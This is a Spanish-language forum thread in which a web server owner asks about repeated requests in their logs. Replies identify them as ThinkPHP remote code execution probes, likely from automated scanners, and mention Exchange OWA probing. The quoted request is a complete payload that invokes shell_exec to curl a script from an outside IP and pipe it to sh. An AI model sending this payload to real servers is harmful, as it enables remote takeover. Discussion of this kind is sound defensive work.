Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:
Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh
Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework
el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.
a ver si alguien tiene mas conocimientos sobre el tema
¿Qué user agent hace la petición?
ThinkPHP Remote Code Execution (RCE)
Usarán alguna herramienta automatizada tipo Nuclei Scanner
https://github.com/projectdiscovery/nuclei
Hay un montón de variantes:
https://www.exploit-db.com/exploits/46150
Ahora la petición estrella es OWA de Microsoft Exchange
GET /owa/auth/logon.aspx
Cita de: el-brujo en 17 Marzo 2021, 00:19 AM
¿Qué user agent hace la petición?
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"